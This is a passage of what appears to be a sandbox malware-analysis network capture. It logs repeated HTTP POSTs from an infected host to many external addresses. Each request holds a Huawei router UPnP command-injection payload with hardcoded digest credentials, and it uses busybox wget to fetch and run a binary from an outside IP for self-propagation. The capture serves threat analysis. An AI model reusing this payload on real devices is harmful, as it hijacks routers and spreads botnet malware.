3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1079192.168.2.1352014157.64.139.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432442904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1080192.168.2.1357708157.16.24.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432461023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1081192.168.2.1342722138.42.77.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432471991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1082192.168.2.1336952157.247.202.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432487011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1083192.168.2.1332832197.84.228.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432504892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1084192.168.2.135440041.42.31.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432518959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1085192.168.2.1341998157.23.121.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432532072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1086192.168.2.134217041.53.253.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432542086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1087192.168.2.13598369.183.249.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432564974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1088192.168.2.135069641.85.133.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432588100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1089192.168.2.1347152197.118.47.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432595015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
